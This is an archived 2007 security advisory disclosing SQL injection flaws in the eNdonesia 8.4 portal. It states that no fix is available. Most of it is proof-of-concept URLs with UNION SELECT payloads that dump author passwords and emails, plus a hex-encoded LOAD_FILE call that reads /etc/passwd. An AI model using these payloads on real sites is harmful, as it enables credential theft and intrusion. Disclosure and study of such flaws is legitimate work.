eNdonesia 8.4 [multiple injection sql] Jun 22 2007 04:24PM
laurent gaffie gmail com
Application: eNdonesia 8.4
Web Site: http://www.endonesia.org/
Versions: all
Platform: linux, windows
Bug: multiple injection sql
Fix Available: no

-------------------------------------------------------

1) Introduction
2) Bug
3) proof of concept

===========
1) Introduction
===========

"eNdonesia 8.4 is a web portal application, content management system,
news publishing systems, or whatever you want to name it. It has been
developed to enable people build their own internet empire by providing portal for the public,
just like what Yahoo has done, and Google want to do. "

======
2) Bug
======

injection sql

=====
3)proof of concept
=====
http://site.com/mod.php?mod=katalog&op=viewlink&cid=-1+union+select+1,pw
d,3+from+authors/*

http://site.com/mod.php?mod=katalog&op=viewlink&cid=-1+union+select+1,LO
AD_FILE(0x2F6574632F706173737764),3+from+authors/*

--> get some local files with load_file ( you it's a priviliged account )

http://site.com/banners.php?op=click&bid=-9+union+select+pwd+from+author
s/*

http://site.com/mod.php?mod=diskusi&op=viewdisk&did=-9+union+select+1,2,
aid,pwd,5,6,email+from+authors/*

http://site.com/mod.php?mod=publisher&op=viewarticle&cid=2&artid=-9+unio
n+select+1,2,3,4,5,pwd,aid,email,9,0+from+authors/*

regards laurent gaffié
contact : laurent.gaffie (at) gmail (dot) com [email concealed]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus